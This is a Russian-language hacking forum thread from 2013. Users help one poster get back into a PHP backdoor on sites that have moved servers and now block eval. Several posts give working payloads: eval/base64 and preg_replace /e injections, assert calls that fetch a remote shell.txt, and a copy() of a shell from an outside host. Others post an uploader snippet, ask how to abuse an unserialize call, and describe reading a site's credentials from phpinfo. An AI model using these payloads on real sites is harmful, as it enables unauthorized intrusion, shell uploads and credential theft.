ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.04.2013, 00:59
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Поверьте, там есть данные:

это твои куки)))
|
|
|

05.04.2013, 01:39
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме: 15756
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Сообщение от sova1611
sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
eval, exec, system, passthru, scandir, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, disk_free_space, diskfreespace, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname
тоесть eval отключён( как теперь можно попасть в шел)
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
" if author else f"
winstrool said:
Сообщение от sova1611
sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
eval, exec, system, passthru, scandir, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, disk_free_space, diskfreespace, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname
тоесть eval отключён( как теперь можно попасть в шел)
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
Я тебе открою страшную хакерскую тайну, только никому не говори!
Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).
|
|
|

05.04.2013, 01:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Поверьте, там есть данные:

ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html
ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.
P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|

05.04.2013, 11:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Сообщение от shell_c0de
shell_c0de said:
ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html
ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.
P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.
В общем все было несколько иначе, просто я, когда писал, решил упростить.
Я прочитал скрипт memcache.php, в котором были логин и пасс в явном виде, потом запустил его, скрипт затребовал авторизацию, я ввел данные и просмотрел предложенные данные, ничего интересного не нашел, открыл индекс, он показал мне, что я не сервере НЕ ЗАЛОГИНЕН, т.е. авторизация к memcache.php происходит в обход базы данных (тупо сравниваются введенные данные со строкой в скрипте). После этого я открыл пхп инфо, согласен, скорее всего куки, логин и пасс перешли туда из моей сессии. Попозже проведу более чистый эксперимент. Куда копать понял.
Но что мне делать с этим админом, который постоянно залогинен, ведь я даже не знаю, совпадает-ли этот пароль с паролем от сайта....
|
|
|
|

05.04.2013, 16:13
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
Сообщение от KolosJey
KolosJey said:
Я тебе открою страшную хакерскую тайну, только никому не говори!
Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).
как я понял решения под мою проблему нет?фильтрует dle кавычки(
|
|
|

05.04.2013, 16:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от sova1611
sova1611 said:
как я понял решения под мою проблему нет?
Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.
Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert
|
|
|
|

05.04.2013, 17:15
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
Сообщение от blesse
blesse said:
Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.
Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert
через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(
print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
тоже не помогло(
|
|
|

05.04.2013, 17:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сообщение от sova1611
sova1611 said:
через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(
Код:
Code:
фильтруются кавычки,пробывал
А preg_replace(base64_decode('')); религия не позволяет?
Че там у тебя может не получиться?
assert(file_get_contents('http://site/shell.txt'));
|
|
|
|

05.04.2013, 17:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
$terms = $input->request->get('highlight', null, 'base64');
$terms = $terms ? unserialize(base64_decode($terms)) : null;
как можно использовать в "своих" целях?
файл highlight.php
|
|
|
|

05.04.2013, 18:14
|
|
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме: 9138
Репутация:
0
|
|
Сообщение от blesse
blesse said:
Код:
Code:
фильтруются кавычки,пробывал
А preg_replace(base64_decode('')); религия не позволяет?
Че там у тебя может не получиться?
assert(file_get_contents('http://site/shell.txt'));
preg_replace(base64_decode(KCIvLiovZSIsInBocGluZm8 oKTsiLCIuIik7)); не срабатывает(
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|